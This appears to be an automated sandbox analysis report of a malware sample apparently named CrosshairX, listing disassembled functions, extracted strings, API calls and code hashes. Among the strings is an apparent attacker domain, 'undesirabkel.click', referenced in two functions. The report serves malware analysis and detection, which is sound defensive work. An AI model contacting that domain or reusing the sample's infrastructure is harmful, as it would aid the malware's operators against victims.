<+m , xrefs: 00431880
J+,,, xrefs: 00431878

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID: FreeLibrary
String ID: %&$<+m $J+,,
API String ID: 3664257935-2903865021
Opcode ID: 46b73d0031d5d22602d103d69066319cd327fe990ffce511ba10d6781edfa6cd
Instruction ID: 06b551e60c4eb0d8c536fdc7b529d72bacf9ad5b21def5957288b1ff5d32845a
Opcode Fuzzy Hash: 46b73d0031d5d22602d103d69066319cd327fe990ffce511ba10d6781edfa6cd
Instruction Fuzzy Hash: F661497160C3819BD328CF28CC557ABBBE1EFD6314F18592DE4C95B392C739840A8B5A

Function 00404370 Relevance: 6.7, Strings: 5, Instructions: 473COMMON

Download Yara Rule

Strings

IHDR, xrefs: 0040476A
), xrefs: 004043EC
), xrefs: 004043F6
IDAT, xrefs: 004047E5
IEND, xrefs: 0040485F

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID: )$)$IDAT$IEND$IHDR
API String ID: 0-3469842109
Opcode ID: 8127568069912f19d4042ed7eb0a877cf802a43ea1678997308c101f6d5b65ec
Instruction ID: 4320fca3e5a4c1b7e70187d4418fe76a6d0274c67fe8d4c6ee8b2e3230aaacb2
Opcode Fuzzy Hash: 8127568069912f19d4042ed7eb0a877cf802a43ea1678997308c101f6d5b65ec
Instruction Fuzzy Hash: 0802DEB56083808FD700DF29D89475A7BE1ABD5304F04857EEA849B392D3B9D90ACB96

Function 00427100 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 235COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000), ref: 00427230

Strings

Eq, xrefs: 0042717A

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: Eq
API String ID: 237503144-1439466809
Opcode ID: 67f9349162184a8bc03b86ccf2c48a661b1ae788edc2a86ff317f6c1da086e21
Instruction ID: d94a3bd5084ead8c8e95632ad16d1513918d45001364c6842ffd181ccd2253a6
Opcode Fuzzy Hash: 67f9349162184a8bc03b86ccf2c48a661b1ae788edc2a86ff317f6c1da086e21
Instruction Fuzzy Hash: FD7122762083549FD310CF64D88135BBBE1EBC9718F45892DF9E49B280D7B8990ACB96

Function 00428950 Relevance: 5.5, Strings: 4, Instructions: 480COMMON

Download Yara Rule

Strings

ZN, xrefs: 00428B72
S;65, xrefs: 00428746
,5./, xrefs: 004287D5, 004287F9, 00428864, 00428874
):'$, xrefs: 00428835

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID: ):'$$,5./$S;65$ZN
API String ID: 0-4129527606
Opcode ID: 536f3a951a4b315c6b08ff74d2397874685a688ae41da1482306f762372c3157
Instruction ID: d0a156b99bf17256f5e0863f0710079763e104fb841c8309f5bbf3e33f56d438
Opcode Fuzzy Hash: 536f3a951a4b315c6b08ff74d2397874685a688ae41da1482306f762372c3157
Instruction Fuzzy Hash: ECF1CF76E012268BDB14CF64D8907BEB7B1FF45304F9984ADC8456B351DB385D42CB98

Function 004288AE Relevance: 5.4, Strings: 4, Instructions: 357COMMON

Download Yara Rule

Strings

ZN, xrefs: 00428B72
S;65, xrefs: 00428746
,5./, xrefs: 004287D5, 004287F9, 00428864, 00428874
):'$, xrefs: 00428835

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID: ):'$$,5./$S;65$ZN
API String ID: 0-4129527606
Opcode ID: 200675bba951af84ffd0586b6df348db5a4abc5f803d1e4a422d0b2f8e4c28c4
Instruction ID: a317ef5c3632e05d8a40f98884f6ca8ab0761c5f02a99a3b6b40ae88948711d4
Opcode Fuzzy Hash: 200675bba951af84ffd0586b6df348db5a4abc5f803d1e4a422d0b2f8e4c28c4
Instruction Fuzzy Hash: 7DC1F176E012668FDB14CF65D8917BEBBB1FF41300F9980ADC8486B251DB385942CF98

Function 0040E579 Relevance: 5.3, Strings: 4, Instructions: 346COMMON

Download Yara Rule

Strings

0T, xrefs: 0040E840
VP, xrefs: 0040E855
(n=M, xrefs: 0040E760
undesirabkel.click, xrefs: 0040E9B5

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID: (n=M$0T$VP$undesirabkel.click
API String ID: 0-3204477792
Opcode ID: ac3577ccf0b5f84683a813668f73118277194633f1b7731c5f03099ce8013f2e
Instruction ID: bc65e217dd32c37e917d73992cb8f26b2910b07b45870e5d4907e1c6cd6cf662
Opcode Fuzzy Hash: ac3577ccf0b5f84683a813668f73118277194633f1b7731c5f03099ce8013f2e
Instruction Fuzzy Hash: DBC1E4B1200B418FD324CF2AC595B62BBE2FF95304F1889ADC4968F7A6D779E815CB44

Function 004424F7 Relevance: 5.3, Strings: 4, Instructions: 341COMMON

Download Yara Rule

Strings

|0t6, xrefs: 00442718, 0044271C
~8u>, xrefs: 00442845
a4g:, xrefs: 0044283D
q, xrefs: 00442855

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID: a4g:$q$|0t6$~8u>
API String ID: 0-3573348960
Opcode ID: 9a0d4cea9c777a286498132f0db1890dec4e9288b4224c380b3722972722d380
Instruction ID: 803fc4c5cf86b22dd499b58d2ec9d8792335e5e7eb800b440c6ead66135f622d
Opcode Fuzzy Hash: 9a0d4cea9c777a286498132f0db1890dec4e9288b4224c380b3722972722d380
Instruction Fuzzy Hash: BCB17CB69183148FD304DF69EC8975FBBD1EB90308F49C93DD889A7351E679890C8B89

Function 004429A0 Relevance: 5.1, Strings: 4, Instructions: 129COMMON

Download Yara Rule

Strings

YF, xrefs: 00442ACA
$VT, xrefs: 00442AAA
ZX, xrefs: 00442AC2
RP, xrefs: 00442AB2

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID: RP$$VT$YF$ZX
API String ID: 0-3367519395
Opcode ID: 17b3015530af6ddb7c543c437789f3931ad896e569697511896058e8192dc596
Instruction ID: f30e9962ddc1c1e326a4881ed9edfed8b5c10db9a088f63b8cdd49c5cd57e41c
Opcode Fuzzy Hash: 17b3015530af6ddb7c543c437789f3931ad896e569697511896058e8192dc596
Instruction Fuzzy Hash: CE415976D183509BE304CF29E85534BBBD2ABC2304F49C83DD8D49B385CA78890E8BC6

Function 004417B0 Relevance: 4.3, Strings: 3, Instructions: 584COMMON

Download Yara Rule

Strings

S"(w, xrefs: 00441AEC
S"(w, xrefs: 004418D0
f, xrefs: 00441A4D

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID: InitializeThunk
String ID: S"(w$S"(w$f
API String ID: 2994545307-891790955
Opcode ID: 31ebdbb594bd9e9619e00b1ad9ea16700248967346c770521a204ab5d9ce2f83
Instruction ID: d28263ea67ecd1e59f8ca9dd32e54760c7e2cae787cfd6a2e193cf98bb5d3b09
Opcode Fuzzy Hash: 31ebdbb594bd9e9619e00b1ad9ea16700248967346c770521a204ab5d9ce2f83
Instruction Fuzzy Hash: A922C3756083418FE714CF15C89072BBBE2BBC5314F28862EE8955B3A1D775DC46CB8A

Function 00417B48 Relevance: 4.2, Strings: 3, Instructions: 491COMMON

Download Yara Rule

Strings

Q-*2, xrefs: 00417FD3
n, xrefs: 00417EFB
c}aFQ-*2, xrefs: 00417D95, 00417D9C

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID: Q-*2$c}aFQ-*2$n
API String ID: 0-2432619918
Opcode ID: 9975c3a9fe93baa196ae0ee29f4c25b1b7f0e6d64691c02828fa778867251eca
Instruction ID: 656ab40a94ec35bf10c2ee49c336ece41195cfa8f552b41df20ec9cd8605c728
Opcode Fuzzy Hash: 9975c3a9fe93baa196ae0ee29f4c25b1b7f0e6d64691c02828fa778867251eca
Instruction Fuzzy Hash: 6DD16975608740DBE320DB25DC80BBB77F2FB86310F244A2EE495972A1D7349C86CB5A

Function 0042C68E Relevance: 4.2, Strings: 3, Instructions: 425COMMON

Download Yara Rule

Strings

/p=v, xrefs: 0042C766
_\, xrefs: 0042C7BE
HN, xrefs: 0042C796

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID: /p=v$_\$HN
API String ID: 0-994060674
Opcode ID: 9d635f7f1281f2313adc299b7b5c566b74050ad1d789b17f786fe430d2cb4f1d
Instruction ID: 15395981e1b154ef4626e50b808ccdc8fa677f847204a5c638b774b1a1cf1c98
Opcode Fuzzy Hash: 9d635f7f1281f2313adc299b7b5c566b74050ad1d789b17f786fe430d2cb4f1d
Instruction Fuzzy Hash: 60D1CFB5A08311CBD320DF14D89176BB7E2FF81318F18882DE5C98B391E7799945CB9A

Function 004099A0 Relevance: 4.2, Strings: 3, Instructions: 424COMMON

Download Yara Rule

Strings

E265C7DB6E0E894A29072D93766B97C1, xrefs: 00409A82
\, xrefs: 00409A14
N, xrefs: 00409B95

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID: E265C7DB6E0E894A29072D93766B97C1$N$\
API String ID: 0-473360419
Opcode ID: e5f89d3033010acb5435600c1ff2259ba28c8e193c2df9db0b783ead9c2f4d71
Instruction ID: d577c57ba8a55cd466c18b629048c7872066e77501627157b6eb3465ee5efe99
Opcode Fuzzy Hash: e5f89d3033010acb5435600c1ff2259ba28c8e193c2df9db0b783ead9c2f4d71
Instruction Fuzzy Hash: 06E1F5715083808FE324CF25C8557ABBBE1EBC5314F14892DE4E59B392DB798806CB86

Function 00426191 Relevance: 4.2, Strings: 3, Instructions: 418COMMON

Download Yara Rule

Strings

E265C7DB6E0E894A29072D93766B97C1, xrefs: 00426446
).G, xrefs: 0042630F, 00426315
undesirabkel.click, xrefs: 0042673B

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID: ).G$E265C7DB6E0E894A29072D93766B97C1$undesirabkel.click
API String ID: 0-410537327
Opcode ID: d1a9075024b57fd6b4e52aa802cc49990d7792c494df6a4220636a76349a5544
Instruction ID: 97ad6b576bf189dc4bb3bb3a733eb30df9b990273ae1603535bab11fbe4edffc
Opcode Fuzzy Hash: d1a9075024b57fd6b4e52aa802cc49990d7792c494df6a4220636a76349a5544
Instruction Fuzzy Hash: 7C221621508BD2DDD322863C8848359BF912B67228F2C83DDD0E55FBD3C3AA9557C7A6

Function 0042B706 Relevance: 4.1, Strings: 3, Instructions: 392COMMON

Download Yara Rule

Strings

[IL_, xrefs: 0042BAC0
<Y^F, xrefs: 0042BAD8
UABN, xrefs: 0042BAD0

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID: <Y^F$UABN$[IL_
API String ID: 0-3098303121
Opcode ID: ab109ae92b83b49d337c0020184009379510516cb87844cbd6d63297977121e6
Instruction ID: 632b85940a5183c5b1ef9c6e933b87b1cc85d006d75116f7368999771c13f5d3
Opcode Fuzzy Hash: ab109ae92b83b49d337c0020184009379510516cb87844cbd6d63297977121e6
Instruction Fuzzy Hash: BAE1F075608381CFD314CF29D88075ABBE2EFC6314F19896DE0998B392D735D945CB86

Function 0041CC70 Relevance: 4.0, Strings: 3, Instructions: 278COMMON

Download Yara Rule

Strings

\], xrefs: 0041CF68
XE, xrefs: 0041CE69, 0041CE6D, 0041CEE8, 0041CF96
$E, xrefs: 0041CF38

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID: $E$XE$\]
API String ID: 0-3496133050
Opcode ID: 31a5053e85f4fd2c4d18c3d3377bfe3d347fed2625b560b5dbc055357d8b4bd7
Instruction ID: ccf807e3638f05dbacafaeb7e0ae39fee791b2778ccabe8f455621f0953c578c
Opcode Fuzzy Hash: 31a5053e85f4fd2c4d18c3d3377bfe3d347fed2625b560b5dbc055357d8b4bd7
Instruction Fuzzy Hash: 59A1DAB254C7109BD310CF66C85569FBFE1EBD6308F58496DF4D89B252C239CA09CB8A

Function 004310BA Relevance: 4.0, Strings: 3, Instructions: 267COMMON

Download Yara Rule

Strings

04(, xrefs: 00431426
", xrefs: 0043135B
)I5M, xrefs: 004312D5

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID: "$)I5M$04(
API String ID: 0-1389332778
Opcode ID: c78f95563ace00afa19198b16a488fe3b1bf2fc344963dc11aaf7cec1e5ede31
Instruction ID: 88daa6d93223a84fa4f08f872f5986970dfb391773db3043bbd8bbd849706c8a
Opcode Fuzzy Hash: c78f95563ace00afa19198b16a488fe3b1bf2fc344963dc11aaf7cec1e5ede31
Instruction Fuzzy Hash: A5613B6020C3818BE7148F29849037BBBD19FDB318F28999EE4D5973D2C67D850ACB5A

Function 00431150 Relevance: 4.0, Strings: 3, Instructions: 265COMMON

Download Yara Rule

Strings

04(, xrefs: 00431426
", xrefs: 0043135B
)I5M, xrefs: 004312D5

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID: "$)I5M$04(
API String ID: 0-1389332778
Opcode ID: f04cde4aa0ba57a2353e229fa49b6d71e0e75f5b7b2f45e6f8fed27d026178d9
Instruction ID: 5dcb8d078e4b22f696ac671710f4d52b8c837f8a410c3da8fcd2c9e588e1543f
Opcode Fuzzy Hash: f04cde4aa0ba57a2353e229fa49b6d71e0e75f5b7b2f45e6f8fed27d026178d9
Instruction Fuzzy Hash: 65613A6020C3818BE7148F29849036BBBD19FDB318F28999EE0D5973D2D67D850ACB5A

Function 004311C0 Relevance: 4.0, Strings: 3, Instructions: 263COMMON

Download Yara Rule

Strings

04(, xrefs: 00431426
", xrefs: 0043135B
)I5M, xrefs: 004312D5

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID: "$)I5M$04(
API String ID: 0-1389332778
Opcode ID: d53cb304f2f7cfc49fecefd1074142e141e2884579164cf6ad2c018f9d929dc2
Instruction ID: 0e13bec8c428417e1eec371e239b8049ae11b4e05f928df3fc91905b3686f9f5
Opcode Fuzzy Hash: d53cb304f2f7cfc49fecefd1074142e141e2884579164cf6ad2c018f9d929dc2
Instruction Fuzzy Hash: 25614C6020C3818BE7148F29C49037BBBD19FDB318F28999EE4D5973D2C67D854ACB5A

Function 004311B1 Relevance: 4.0, Strings: 3, Instructions: 239COMMON

Download Yara Rule

Strings

04(, xrefs: 00431426
", xrefs: 0043135B
)I5M, xrefs: 004312D5

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID: "$)I5M$04(
API String ID: 0-1389332778
Opcode ID: 112561bc02ef524550a8a2734e305f4042aa434cf04125222d1914b06a90428f
Instruction ID: 4e6fcf0c605a44f6db17a82f673648063e68d92a4ec56e148b2773195bd28a79
Opcode Fuzzy Hash: 112561bc02ef524550a8a2734e305f4042aa434cf04125222d1914b06a90428f
Instruction Fuzzy Hash: E251296060C3818BE3148F29C4A037BBFE1AFD7318F28599EE0D557392D679850ACB5A

Function 0041C079 Relevance: 3.9, Strings: 3, Instructions: 188COMMON

Download Yara Rule

Strings

51-", xrefs: 0041C215
=>=", xrefs: 0041C22D
?, xrefs: 0041C0B5

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID: 51-"$=>="$?
API String ID: 0-2657603097
Opcode ID: c805f1b0b4743857e9f7da9e608faec44bb7100d6bfc13ecc632ad2f5d0ececa
Instruction ID: abe61c85b96632bd74c37d8c5f1787647cda390835a3c9a37847f1dd2440e736
Opcode Fuzzy Hash: c805f1b0b4743857e9f7da9e608faec44bb7100d6bfc13ecc632ad2f5d0ececa
Instruction Fuzzy Hash: FD51037555C3808FE714CF25C8947ABBBE2ABD2304F48996CE0C19B286C7B9C445CB87

Function 004378FB Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 236memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 004379F5

Strings

0, xrefs: 00437C5E

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID: AllocString
String ID: 0
API String ID: 2525500382-4108050209
Opcode ID: 09bc1ab1905b25910a8a01dbc1452972541535cd75be3c6018e2450bba2cf265
Instruction ID: dd3474a45a7167f8a27126f882d837f98027cbf53dd68a361ddafde7143b30f2
Opcode Fuzzy Hash: 09bc1ab1905b25910a8a01dbc1452972541535cd75be3c6018e2450bba2cf265
Instruction Fuzzy Hash: 32B17F21208FC18ED336CA3C8949707BFD26B97224F488F9DD0F68BBD6D664A505C716

Function 00437209 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 226memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 0043729E

Strings

0, xrefs: 00437507

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID: AllocString
String ID: 0
API String ID: 2525500382-4108050209
Opcode ID: b3724db7008c44cbfb2c646fed1c8bd05f5962522087fa56888fab81c3ddb40e
Instruction ID: b5a40d7ea97aebc5893e6e27d86def258ab9b1b2f80845d29d48768c353e19d9
Opcode Fuzzy Hash: b3724db7008c44cbfb2c646fed1c8bd05f5962522087fa56888fab81c3ddb40e
Instruction Fuzzy Hash: BAB14061208FC28ED336CA3C8849347BFD25B56224F4C8F9DD0F68BBD6D665A506C726

Function 0043F2A0 Relevance: 3.3, Strings: 2, Instructions: 799COMMON

Download Yara Rule

Strings

5N, xrefs: 0043F9FC
DE, xrefs: 0043F899

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID: 5N$DE
API String ID: 0-2043625159
Opcode ID: 56d6ab719762ac1ddd078ba46e7c95a81bdd69bdfcab1da4a84728f9e7cd3524
Instruction ID: 83aa22a50d27ce0e7621e4d1e47ab5a7a3487068b2e759fb74d055592eeab4a0
Opcode Fuzzy Hash: 56d6ab719762ac1ddd078ba46e7c95a81bdd69bdfcab1da4a84728f9e7cd3524
Instruction Fuzzy Hash: CC42323AA183118BC7149F29D89136BB7E2FF9A324F1AC97DC484873A1E778C945C746

Function 00404E90 Relevance: 3.3, Strings: 2, Instructions: 792COMMON

Download Yara Rule

Strings

8, xrefs: 004057A3
0, xrefs: 004057AB

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: eebed6dc8e11df87bd74faa56350dc9cb2274da1e482efa1afae510884b58765
Instruction ID: 29d0da6d1db7d2ac2b64a0d86f4db615f3d21dc3bf4c96d3c38e48e2a60d2689
Opcode Fuzzy Hash: eebed6dc8e11df87bd74faa56350dc9cb2274da1e482efa1afae510884b58765
Instruction Fuzzy Hash: 0E722171508740AFD714CF18C884BABBBE1EB88314F14892EF9899B391D379D958CF96

Function 0041D510 Relevance: 3.0, Strings: 2, Instructions: 488COMMON

Download Yara Rule

Strings

bc, xrefs: 0041D5FA
xy, xrefs: 0041D89A

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID: bc$xy
API String ID: 0-4248330119
Opcode ID: b23a3f66dd391eac7994c44d81ce0ea2c8299881f36ba2bf512cdeee6f0c6840
Instruction ID: 8cb5c90ee0683dd14a4d3f13ba8741cb9397d3f9fe31891cc7d0a66556a588b2
Opcode Fuzzy Hash: b23a3f66dd391eac7994c44d81ce0ea2c8299881f36ba2bf512cdeee6f0c6840
Instruction Fuzzy Hash: 43D1D1B1A183108BC314DF28C8917ABB7F2EFC5318F18891DE8959B395EB78D945C786

Function 00444C10 Relevance: 2.9, Strings: 2, Instructions: 449COMMON

Download Yara Rule

Strings

C:, xrefs: 00444C55
"PD, xrefs: 00445012

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID: "PD$C:
API String ID: 0-2152004819
Opcode ID: 180c18709d0719a79b5cbf3ea4b56d75dd592a389bfa211a0234286fb112737a
Instruction ID: 284c632e66a7de604f80d28d8d54ecff75fbfcb872d88c2d904d20af7ba505c1
Opcode Fuzzy Hash: 180c18709d0719a79b5cbf3ea4b56d75dd592a389bfa211a0234286fb112737a
Instruction Fuzzy Hash: 32E11639618350CFD708CF38D99072BB7E1EBDA314F19897EE98697392DA34D8098B45

Function 0040BB3C Relevance: 2.8, Strings: 2, Instructions: 283COMMON

Download Yara Rule

Strings

c45:, xrefs: 0040B902
c45:, xrefs: 0040B8BC

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID: c45:$c45:
API String ID: 0-2270682391
Opcode ID: 8c92dad9c4c0c9754d997dcdb65966eea571a73515bfb10b96cc41f813eefd9d
Instruction ID: 702e4dcd8f953d88f4bdcfd87278194ad4f02714e9f55e1c7871811ed3f3cd0c
Opcode Fuzzy Hash: 8c92dad9c4c0c9754d997dcdb65966eea571a73515bfb10b96cc41f813eefd9d
Instruction Fuzzy Hash: 05A1A839240700DFD7248F29EC85B16B7F5FB4A310F098979E896876A1DB38E825CF59

Function 0041B4F0 Relevance: 2.7, Strings: 2, Instructions: 241COMMON

Download Yara Rule

Strings

_, xrefs: 0041B648
2]=_, xrefs: 0041B507

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID: 2]=_$_
API String ID: 0-1466886221
Opcode ID: 7ab0bc11d214788398c4d176e88b094251a953b88361e3ba0dd5c38e6e4f6099
Instruction ID: 4f3df3613ab8095c48356ea9c9b9f6c31dc738ebef77bc57155b7e2b6d451ff5
Opcode Fuzzy Hash: 7ab0bc11d214788398c4d176e88b094251a953b88361e3ba0dd5c38e6e4f6099
Instruction Fuzzy Hash: 2781095520464149D72CDF7489A333BBAE6DF84308F2891BFC995CF79AED38C502878A

Function 004150C0 Relevance: 2.2, Strings: 1, Instructions: 977COMMON

Download Yara Rule

Strings

NP,?, xrefs: 00415500

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd
